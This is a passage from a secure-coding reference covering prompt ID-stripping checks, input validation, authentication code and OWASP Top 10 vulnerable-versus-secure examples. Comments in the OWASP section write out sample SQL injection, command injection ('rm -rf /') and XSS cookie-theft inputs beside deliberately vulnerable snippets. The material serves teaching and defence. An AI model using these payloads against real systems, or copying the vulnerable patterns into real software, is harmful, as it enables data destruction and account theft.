- Full-text search filtered by tenant
Phase 3: Source References Captured
- document_ids saved for attribution
- chunk_ids saved for attribution
- Retrieval timestamp recorded
- Similarity scores captured (for debugging)
Phase 4: Content Extraction
- Only content text extracted (no metadata with IDs)
- Content stripped of any embedded UUIDs
- Content stripped of any ID field names
Phase 5: Prompt Building
- Prompt contains ONLY content text
- No user_id in prompt
- No tenant_id in prompt
- No analysis_id in prompt
- No document_id in prompt
- No UUIDs in prompt
- No API keys or secrets in prompt
Phase 6: Prompt Audit
- audit_prompt() called on final prompt
- No critical violations detected
- Warnings logged for review
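A minimal sketch of the audit_prompt() check referenced above: scan the final prompt for UUIDs and ID-like field names. The real implementation may carry more patterns and severity levels; these two checks and the violation labels are illustrative:

```python
# Sketch: detect UUIDs and internal ID field names in an outgoing prompt.
import re

UUID_RE = re.compile(
    r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I
)
ID_FIELD_RE = re.compile(r"\b(user_id|tenant_id|analysis_id|document_id)\b")


def audit_prompt(prompt: str) -> list[str]:
    """Return a list of violations; an empty list means the prompt is clean."""
    violations = []
    if UUID_RE.search(prompt):
        violations.append("uuid_in_prompt")
    if ID_FIELD_RE.search(prompt):
        violations.append("id_field_in_prompt")
    return violations


def has_critical_violations(violations: list[str]) -> bool:
    return bool(violations)
```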
Phase 7: LLM Call
- Timeout configured
- Error handling in place
- Response parsing ready
- Langfuse trace started
Quick Verification Script
from llm_safety import audit_prompt, has_critical_violations
def verify_llm_ready(
prompt: str,
ctx: RequestContext,
source_refs: SourceReference,
) -> bool:
"""Quick verification before LLM call"""
# Check context
assert ctx.user_id is not None, "Missing user_id"
assert ctx.tenant_id is not None, "Missing tenant_id"
# Check source refs captured
assert len(source_refs.document_ids) > 0, "Source refs not captured"
# Audit prompt
violations = audit_prompt(prompt)
if has_critical_violations(violations):
raise PromptSecurityError(violations)
return True
Post-LLM Attribution Checklist
After LLM returns:
- Output parsed with schema validation
- Output checked for hallucinated IDs
- Output checked for grounding
- Content safety validated
- Attribution attached from RequestContext
- Source links created from captured refs
- Audit event logged
- Langfuse trace completed
Sign-off: Run verify_llm_ready() before every LLM call
Safety Checklist
LLM Safety Checklist
Input Safety
- Validate input length
- Detect prompt injection attempts
- Sanitize user content
- Rate limit requests
Output Safety
- Content filtering
- PII detection and redaction
- Harmful content detection
- Bias monitoring
System Prompts
- Clear boundaries
- Role definition
- Refusal instructions
- No secrets in prompts
Guardrails
- Input guardrails
- Output guardrails
- Topic restrictions
- Sensitive content handling
Monitoring
- Log flagged content
- Alert on violations
- Human review queue
- Incident response plan
Validation Checklist
Input Validation Checklist
Core Principles
- Never trust user input - validate everything
- Validate server-side - client-side is UX only
- Use allowlists - not blocklists
- Validate type, length, format, range
- Sanitize output - escape when rendering
Schema Definition
- Define schema for all API endpoints
- Use strict types (no any)
- Set reasonable min/max lengths
- Use enums for fixed value sets
- Add custom error messages
- Handle optional vs required properly
String Validation
- Trim whitespace where appropriate
- Set maximum length (prevent DoS)
- Use regex for format validation
- Escape HTML for display
- Validate email with proper regex
- Validate URLs against allowlist domains
Number Validation
- Use integer for IDs
- Set min/max bounds
- Handle NaN and Infinity
- Use coercion for query params
File Validation
- Check file extension
- Validate MIME type
- Verify magic bytes (actual content)
- Set maximum file size
- Scan for malware (production)
- Generate new filename (no user input)
Database Query Safety
- Use parameterized queries
- Allowlist sort columns
- Validate pagination limits
- Escape identifiers if dynamic
Error Messages
- Generic errors for users
- Detailed errors in logs only
- Don't reveal system internals
- Don't reveal valid usernames/emails
Validation Libraries
TypeScript/JavaScript
import { z } from 'zod';
import { zodResolver } from '@hookform/resolvers/zod';
import DOMPurify from 'dompurify';
Python
from pydantic import BaseModel, EmailStr, Field
from markupsafe import escape
Common Patterns
Allowlist (✅ Do)
const allowed = ['name', 'email', 'createdAt'];
if (!allowed.includes(sortColumn)) throw new Error('Invalid');
Blocklist (❌ Don't)
const blocked = ['password', 'secret'];
if (blocked.includes(field)) throw new Error('Invalid');
// Problem: Forgets to block new sensitive fields
Type Coercion
- Use z.coerce.* for query parameters
- Handle empty strings appropriately
- Consider timezone for dates
- Parse numbers from strings safely
Async Validation
- Use for uniqueness checks (email, username)
- Rate limit async validations
- Cache validation results where appropriate
- Handle race conditions
Security Headers
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Review Checklist
Before PR:
- All endpoints have input validation
- Server-side validation implemented
- Allowlists used instead of blocklists
- Error messages don't leak info
- File uploads validate content, not just extension
- SQL queries use parameterized statements
- HTML output is escaped
- Maximum lengths set on all strings
Common Vulnerabilities to Prevent
| Vulnerability | Prevention |
|---|---|
| SQL Injection | Parameterized queries |
| XSS | HTML escaping, CSP |
| Path Traversal | Validate/sanitize paths |
| SSRF | URL allowlist |
| ReDoS | Avoid complex regex |
| Buffer Overflow | Length limits |
Examples (3)
Auth Implementations
Authentication Implementation Examples
Password Hashing (Argon2id)
from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError
ph = PasswordHasher(
time_cost=3, # Number of iterations
memory_cost=65536, # 64 MB
parallelism=4, # Number of threads
)
def hash_password(password: str) -> str:
"""Hash password with Argon2id."""
return ph.hash(password)
def verify_password(password_hash: str, password: str) -> bool:
"""Verify password against hash."""
try:
ph.verify(password_hash, password)
return True
except VerifyMismatchError:
return False
# Check if rehash needed (parameters changed)
def needs_rehash(password_hash: str) -> bool:
return ph.check_needs_rehash(password_hash)
JWT Access Token
import os
import jwt
from datetime import datetime, timedelta, timezone
SECRET_KEY = os.environ["JWT_SECRET_KEY"]
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 15
def create_access_token(user_id: str, roles: list[str] | None = None) -> str:
"""Create short-lived access token."""
now = datetime.now(timezone.utc)
payload = {
"sub": user_id,
"type": "access",
"roles": roles or [],
"iat": now,
"exp": now + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES),
}
return jwt.encode(payload, SECRET_KEY, algorithm=ALGORITHM)
def verify_access_token(token: str) -> dict | None:
"""Verify and decode access token."""
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
if payload.get("type") != "access":
return None
return payload
except jwt.ExpiredSignatureError:
return None
except jwt.InvalidTokenError:
return None
Session Management
import os
from flask import Flask, session, request, redirect, render_template
from datetime import datetime, timedelta, timezone
app = Flask(__name__)
# Secure session configuration
app.config.update(
SECRET_KEY=os.environ["SESSION_SECRET"],
SESSION_COOKIE_SECURE=True, # HTTPS only
SESSION_COOKIE_HTTPONLY=True, # No JavaScript access
SESSION_COOKIE_SAMESITE='Strict', # CSRF protection
PERMANENT_SESSION_LIFETIME=timedelta(hours=1),
)
@app.route('/login', methods=['POST'])
def login():
user = authenticate(request.form['email'], request.form['password'])
if user:
session.permanent = True
session['user_id'] = user.id
session['created_at'] = datetime.now(timezone.utc).isoformat()
return redirect('/dashboard')
return render_template('login.html', error='Invalid credentials')
@app.route('/logout', methods=['POST'])
def logout():
session.clear()
return redirect('/login')
Rate Limiting
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
limiter = Limiter(
    get_remote_address,  # key_func is the first positional argument in flask-limiter >= 3.0
    app=app,
    default_limits=["200 per day", "50 per hour"],
    storage_uri="redis://localhost:6379",
)
@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute") # Strict rate limit for login
def login():
# Login logic
pass
@app.route('/api/auth/password-reset', methods=['POST'])
@limiter.limit("3 per hour") # Very strict for password reset
def password_reset():
# Always return success (don't reveal if email exists)
return {"message": "If email exists, reset link sent"}
Role-Based Access Control
from functools import wraps
from flask import abort, g
def require_role(*roles):
"""Decorator to require specific role(s)."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.current_user:
abort(401)
if not any(role in g.current_user.roles for role in roles):
abort(403)
return f(*args, **kwargs)
return wrapper
return decorator
def require_permission(permission: str):
"""Decorator to require specific permission."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.current_user:
abort(401)
if not g.current_user.has_permission(permission):
abort(403)
return f(*args, **kwargs)
return wrapper
return decorator
# Usage
@app.route('/admin/users')
@require_role('admin')
def admin_users():
return get_all_users()
@app.route('/api/patients/<id>')
@require_permission('patients:read')
def get_patient(id):
return get_patient_by_id(id)
Multi-Factor Authentication (TOTP)
import pyotp
import qrcode
from io import BytesIO
import base64
def generate_totp_secret() -> str:
"""Generate new TOTP secret for user."""
return pyotp.random_base32()
def get_totp_provisioning_uri(secret: str, email: str, issuer: str = "MyApp") -> str:
"""Get provisioning URI for authenticator app."""
totp = pyotp.TOTP(secret)
return totp.provisioning_uri(name=email, issuer_name=issuer)
def get_totp_qr_code(provisioning_uri: str) -> str:
"""Generate QR code as base64 image."""
qr = qrcode.QRCode(version=1, box_size=10, border=5)
qr.add_data(provisioning_uri)
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white")
buffer = BytesIO()
img.save(buffer, format="PNG")
return base64.b64encode(buffer.getvalue()).decode()
def verify_totp(secret: str, code: str) -> bool:
"""Verify TOTP code."""
totp = pyotp.TOTP(secret)
return totp.verify(code, valid_window=1) # Allow 1 period window
# Usage
@app.route('/api/auth/mfa/setup', methods=['POST'])
@login_required
def setup_mfa():
secret = generate_totp_secret()
uri = get_totp_provisioning_uri(secret, g.current_user.email)
qr = get_totp_qr_code(uri)
# Store secret temporarily until verified
session['pending_mfa_secret'] = secret
return {"qr_code": qr, "secret": secret}
@app.route('/api/auth/mfa/verify', methods=['POST'])
@login_required
def verify_mfa_setup():
code = request.json['code']
secret = session.get('pending_mfa_secret')
# Guard against a missing session secret before verifying
if secret and verify_totp(secret, code):
g.current_user.mfa_secret = secret
g.current_user.mfa_enabled = True
db.session.commit()
return {"success": True}
return {"error": "Invalid code"}, 400

Complete Login Flow with MFA
@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
email = request.json.get('email')
password = request.json.get('password')
user = User.query.filter_by(email=email).first()
# Don't reveal if user exists
if not user or not verify_password(user.password_hash, password):
return {"error": "Invalid credentials"}, 401
# Check if MFA required
if user.mfa_enabled:
# Create temporary token for MFA step
mfa_token = create_mfa_pending_token(user.id)
return {"mfa_required": True, "mfa_token": mfa_token}
# No MFA - issue tokens
return issue_tokens(user)
@app.route('/api/auth/mfa', methods=['POST'])
@limiter.limit("5 per minute")
def verify_mfa():
mfa_token = request.json.get('mfa_token')
code = request.json.get('code')
# Verify MFA pending token
user_id = verify_mfa_pending_token(mfa_token)
if not user_id:
return {"error": "Invalid or expired MFA token"}, 401
user = User.query.get(user_id)
# Verify TOTP code
if not verify_totp(user.mfa_secret, code):
return {"error": "Invalid MFA code"}, 401
return issue_tokens(user)
def issue_tokens(user):
"""Issue access and refresh tokens."""
access_token = create_access_token(user.id, user.roles)
refresh_token = create_refresh_token(user.id)
return {
"access_token": access_token,
"refresh_token": refresh_token,
"token_type": "Bearer",
"expires_in": ACCESS_TOKEN_EXPIRE_MINUTES * 60,
}

OWASP Top 10 Fixes
OWASP Top 10 - Vulnerable vs Secure Code
Real examples of vulnerable code paired with secure alternatives.
A01: Broken Access Control
❌ Vulnerable: Direct Object Reference
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int):
# Anyone can access any document by guessing IDs
return db.query(Document).get(doc_id)

✅ Secure: Authorization Check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int, current_user: User = Depends(get_current_user)):
doc = db.query(Document).get(doc_id)
if doc is None:
    raise HTTPException(404, "Document not found")
if doc.owner_id != current_user.id and not current_user.is_admin:
    raise HTTPException(403, "Access denied")
return doc

A02: Cryptographic Failures
❌ Vulnerable: Weak Hashing
import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()

✅ Secure: Modern Password Hashing
from passlib.hash import argon2
password_hash = argon2.hash(password)
# Verify: argon2.verify(password, password_hash)

A03: Injection
❌ Vulnerable: SQL Injection
query = f"SELECT * FROM users WHERE name = '{name}'"
cursor.execute(query)  # name = "'; DROP TABLE users; --"

✅ Secure: Parameterized Query
cursor.execute("SELECT * FROM users WHERE name = %s", (name,))
# Or with ORM:
db.query(User).filter(User.name == name).first()

❌ Vulnerable: Command Injection
import os
os.system(f"convert {filename} output.png")  # filename = "; rm -rf /"

✅ Secure: Use subprocess with list args
import subprocess
subprocess.run(["convert", filename, "output.png"], check=True)

A05: Security Misconfiguration
❌ Vulnerable: Debug in Production
app = Flask(__name__)
app.run(debug=True)  # Exposes debugger, allows code execution

✅ Secure: Environment-based Config
app = Flask(__name__)
app.run(debug=os.getenv("FLASK_ENV") == "development")

❌ Vulnerable: CORS Allow All
CORS(app, origins="*", supports_credentials=True)

✅ Secure: Explicit Origins
CORS(app, origins=["https://app.example.com"], supports_credentials=True)

A07: XSS (Cross-Site Scripting)
❌ Vulnerable: Unescaped Output
element.innerHTML = userInput; // userInput = "<img src=x onerror=stealCookies()>"

✅ Secure: Text Content or Sanitization
element.textContent = userInput; // Automatically escaped
// Or with sanitization:
element.innerHTML = DOMPurify.sanitize(userInput);

React (Safe by Default)
// ✅ Safe - React escapes by default
<div>{userInput}</div>
// ❌ Dangerous - explicitly bypasses escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />

A08: Insecure Deserialization
❌ Vulnerable: Pickle from Untrusted Source
import pickle
data = pickle.loads(user_input)  # Can execute arbitrary code

✅ Secure: Use JSON
import json
data = json.loads(user_input)  # Only parses data, no code execution

Quick Reference
| Vulnerability | Fix |
|---|---|
| SQL Injection | Parameterized queries, ORM |
| XSS | Escape output, CSP headers |
| CSRF | CSRF tokens, SameSite cookies |
| Auth bypass | Check permissions every request |
| Secrets in code | Environment variables, vault |
| Weak crypto | Argon2/bcrypt, TLS 1.3, AES-256-GCM |
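The CSRF row in the table above can be sketched concretely. A minimal, hand-rolled token pair for the double-submit pattern (for illustration only; in production a framework integration such as Flask-WTF typically handles this):

```python
import hmac
import secrets

# Double-submit pattern: the token stored in the session must match the
# token echoed back in the form field or request header.
def generate_csrf_token() -> str:
    return secrets.token_urlsafe(32)

def validate_csrf_token(session_token: str, submitted_token: str) -> bool:
    # Constant-time comparison avoids timing side channels
    return hmac.compare_digest(session_token, submitted_token)

# Pair this with restrictive cookie flags on the session cookie:
#   Set-Cookie: session=...; HttpOnly; Secure; SameSite=Lax
```

`SameSite=Lax` alone blocks most cross-site POSTs in modern browsers; the token adds defense in depth for older clients and edge cases.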
Validation Patterns
Input Validation Patterns
API Request Validation (TypeScript)
import { z } from 'zod';
// Request body schema
const CreateUserSchema = z.object({
email: z.string().email(),
password: z.string().min(8).max(100),
name: z.string().min(2).max(100).transform(s => s.trim()),
role: z.enum(['user', 'admin']).default('user'),
metadata: z.record(z.string()).optional(),
});
type CreateUserRequest = z.infer<typeof CreateUserSchema>;
// Express middleware
function validateBody<T extends z.ZodSchema>(schema: T) {
return (req: Request, res: Response, next: NextFunction) => {
const result = schema.safeParse(req.body);
if (!result.success) {
return res.status(400).json({
error: 'Validation failed',
details: result.error.flatten().fieldErrors,
});
}
req.body = result.data;
next();
};
}
// Usage
app.post('/api/users', validateBody(CreateUserSchema), async (req, res) => {
const user = req.body as CreateUserRequest;
// user is fully typed and validated
});

Query Parameter Validation
const PaginationSchema = z.object({
page: z.coerce.number().int().positive().default(1),
limit: z.coerce.number().int().min(1).max(100).default(20),
sort: z.enum(['name', 'email', 'createdAt']).default('createdAt'),
order: z.enum(['asc', 'desc']).default('desc'),
});
function validateQuery<T extends z.ZodSchema>(schema: T) {
return (req: Request, res: Response, next: NextFunction) => {
const result = schema.safeParse(req.query);
if (!result.success) {
return res.status(400).json({
error: 'Invalid query parameters',
details: result.error.flatten().fieldErrors,
});
}
req.query = result.data;
next();
};
}
app.get('/api/users', validateQuery(PaginationSchema), (req, res) => {
const { page, limit, sort, order } = req.query;
// All values are properly typed and defaulted
});

Discriminated Union for Polymorphic Data
const NotificationSchema = z.discriminatedUnion('type', [
z.object({
type: z.literal('email'),
email: z.string().email(),
subject: z.string().min(1),
body: z.string().min(1),
}),
z.object({
type: z.literal('sms'),
phone: z.string().regex(/^\+[1-9]\d{1,14}$/),
message: z.string().max(160),
}),
z.object({
type: z.literal('push'),
deviceToken: z.string().min(1),
title: z.string().max(50),
body: z.string().max(200),
}),
]);
type Notification = z.infer<typeof NotificationSchema>;
// Type-safe handling
function sendNotification(notification: Notification) {
switch (notification.type) {
case 'email':
return sendEmail(notification.email, notification.subject, notification.body);
case 'sms':
return sendSMS(notification.phone, notification.message);
case 'push':
return sendPush(notification.deviceToken, notification.title, notification.body);
}
}

Allowlist Validation
// Only allow specific values
const SortColumnSchema = z.enum(['name', 'email', 'createdAt', 'updatedAt']);
// For dynamic allowlists
function createAllowlistSchema<T extends string>(allowed: readonly T[]) {
return z.enum(allowed as [T, ...T[]]);
}
const allowedColumns = ['name', 'email', 'createdAt'] as const;
const DynamicSortSchema = createAllowlistSchema(allowedColumns);

File Upload Validation
const FileUploadSchema = z.object({
file: z.object({
name: z.string(),
type: z.enum(['image/jpeg', 'image/png', 'image/webp', 'application/pdf']),
size: z.number().max(5 * 1024 * 1024, 'File must be under 5MB'),
}),
});
// Validate file content (magic bytes)
const imageMagicBytes: Record<string, number[]> = {
'image/jpeg': [0xFF, 0xD8, 0xFF],
'image/png': [0x89, 0x50, 0x4E, 0x47],
'image/webp': [0x52, 0x49, 0x46, 0x46],
'application/pdf': [0x25, 0x50, 0x44, 0x46],
};
function validateFileContent(buffer: Buffer, mimeType: string): boolean {
const expected = imageMagicBytes[mimeType];
if (!expected) return false;
return expected.every((byte, i) => buffer[i] === byte);
}

URL Validation with Domain Allowlist
const ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com'] as const;
const UrlSchema = z.string()
.url()
.refine(
(url) => {
const { hostname, protocol } = new URL(url);
return protocol === 'https:' && ALLOWED_DOMAINS.includes(hostname as any);
},
{ message: 'URL must be HTTPS and from allowed domains' }
);
// Usage
UrlSchema.parse('https://api.example.com/data'); // OK
UrlSchema.parse('https://evil.com/data'); // Error
UrlSchema.parse('http://api.example.com/data'); // Error (not HTTPS)

Python (Pydantic) Validation
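The URL allowlist above is TypeScript; the same policy translates directly to Python. A minimal sketch using the standard-library `urllib.parse` (function name and domain list mirror the Zod version and are illustrative):

```python
from urllib.parse import urlparse

ALLOWED_DOMAINS = frozenset({"api.example.com", "cdn.example.com"})

def validate_url(url: str) -> bool:
    # Same policy as the Zod refinement: HTTPS only, exact hostname allowlist
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_DOMAINS
```

Checking `parsed.hostname` (rather than substring-matching the raw string) avoids bypasses like `https://api.example.com.evil.com/`.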
from pydantic import BaseModel, EmailStr, Field, field_validator
from typing import Literal, Union
# Basic model
class UserCreate(BaseModel):
email: EmailStr
name: str = Field(min_length=2, max_length=100)
age: int = Field(ge=0, le=150)
@field_validator('name')
@classmethod
def strip_and_title(cls, v: str) -> str:
return v.strip().title()
# Discriminated union
class EmailNotification(BaseModel):
type: Literal['email']
email: EmailStr
subject: str
body: str
class SMSNotification(BaseModel):
type: Literal['sms']
phone: str
message: str = Field(max_length=160)
Notification = Union[EmailNotification, SMSNotification]
# Allowlist validation
ALLOWED_COLUMNS = frozenset(['name', 'email', 'created_at'])
def validate_sort_column(column: str) -> str:
if column not in ALLOWED_COLUMNS:
raise ValueError(f"Invalid sort column: {column}")
return column

HTML Sanitization
from markupsafe import escape
@app.route('/comment', methods=['POST'])
def create_comment():
# Escape HTML to prevent XSS
content = escape(request.form['content'])
db.execute("INSERT INTO comments (content) VALUES (?)", [content])

import DOMPurify from 'dompurify';
// Sanitize HTML input
const sanitizedHtml = DOMPurify.sanitize(userInput, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
ALLOWED_ATTR: ['href'],
});

Form Validation with React Hook Form
import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';
const SignupSchema = z.object({
email: z.string().email('Invalid email'),
password: z.string()
.min(8, 'Password must be at least 8 characters')
.regex(/[A-Z]/, 'Must contain uppercase')
.regex(/[0-9]/, 'Must contain number'),
confirmPassword: z.string(),
}).refine(data => data.password === data.confirmPassword, {
message: "Passwords don't match",
path: ['confirmPassword'],
});
type SignupForm = z.infer<typeof SignupSchema>;
function SignupForm() {
const { register, handleSubmit, formState: { errors } } = useForm<SignupForm>({
resolver: zodResolver(SignupSchema),
});
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input {...register('email')} placeholder="Email" />
{errors.email && <span className="error">{errors.email.message}</span>}
<input {...register('password')} type="password" placeholder="Password" />
{errors.password && <span className="error">{errors.password.message}</span>}
<input {...register('confirmPassword')} type="password" placeholder="Confirm" />
{errors.confirmPassword && <span className="error">{errors.confirmPassword.message}</span>}
<button type="submit">Sign Up</button>
</form>
);
}